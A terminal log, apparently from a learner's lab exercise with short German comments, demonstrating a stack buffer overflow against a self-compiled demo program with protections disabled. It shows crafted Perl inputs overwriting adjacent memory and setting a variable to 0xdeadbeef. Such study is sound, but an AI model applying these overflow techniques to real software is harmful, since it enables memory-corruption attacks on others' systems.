root@toshiba:/home/tomovic/hack# gcc -g -fno-stack-protector -z execstack -o overflow_example overflow_example.c
root@toshiba:/home/tomovic/hack# ./overflow_example $(perl -e 'print "A"x30')
[BEFORE] buffer_two is at 0xbffff6ec and contains 'two'
[BEFORE] buffer_one is at 0xbffff6f4 and contains 'one'
[BEFORE] value is at 0xbffff6fc and is 5 (0x00000005)
[STRCPY] copying 30 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff6ec and contains 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xbffff6f4 and contains 'AAAAAAAAAAAAAAAAAAAAAA'
[AFTER] value is at 0xbffff6fc and is 1094795585 (0x41414141)
root@toshiba:/home/tomovic/hack# gdb -q
(gdb) print 0xbffff6fc - 0xbffff6ec
$1 = 16
(gdb) quit
Das neue OS arbeitet anders, so wie die Verwaltung von den Variablen. Es kann auch sein, dass in ein paar Jahren ihr 12 Byte als Spielraum bekommt.
root@toshiba:/home/tomovic/hack# ./overflow_example $(perl -e 'print "A"x20 . "abcd"')
[BEFORE] buffer_two is at 0xbffff6ec and contains 'two'
[BEFORE] buffer_one is at 0xbffff6f4 and contains 'one'
[BEFORE] value is at 0xbffff6fc and is 5 (0x00000005)
[STRCPY] copying 24 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff6ec and contains 'AAAAAAAAAAAAAAAAAAAAabcd'
[AFTER] buffer_one is at 0xbffff6f4 and contains 'AAAAAAAAAAAAabcd'
[AFTER] value is at 0xbffff6fc and is 1094795585 (0x41414141)
20 ist falsch, der String ist zu lang
root@toshiba:/home/tomovic/hack# ./overflow_example $(perl -e 'print "A"x16 . "abcd"')
[BEFORE] buffer_two is at 0xbffff6fc and contains 'two'
[BEFORE] buffer_one is at 0xbffff704 and contains 'one'
[BEFORE] value is at 0xbffff70c and is 5 (0x00000005)
[STRCPY] copying 20 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff6fc and contains 'AAAAAAAAAAAAAAAAabcd'
[AFTER] buffer_one is at 0xbffff704 and contains 'AAAAAAAAabcd'
[AFTER] value is at 0xbffff70c and is 1684234849 (0x64636261)
root@toshiba:/home/tomovic/hack# ./overflow_example $(perl -e 'print "A"x16 . "\xef\xbe\xad\xde"')
[BEFORE] buffer_two is at 0xbffff6fc and contains 'two'
[BEFORE] buffer_one is at 0xbffff704 and contains 'one'
[BEFORE] value is at 0xbffff70c and is 5 (0x00000005)
[STRCPY] copying 20 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff6fc and contains 'AAAAAAAAAAAAAAAAᆳ '
[AFTER] buffer_one is at 0xbffff704 and contains 'AAAAAAAAᆳ '
[AFTER] value is at 0xbffff70c and is -559038737 (0xdeadbeef)
root@toshiba:/home/tomovic/hack#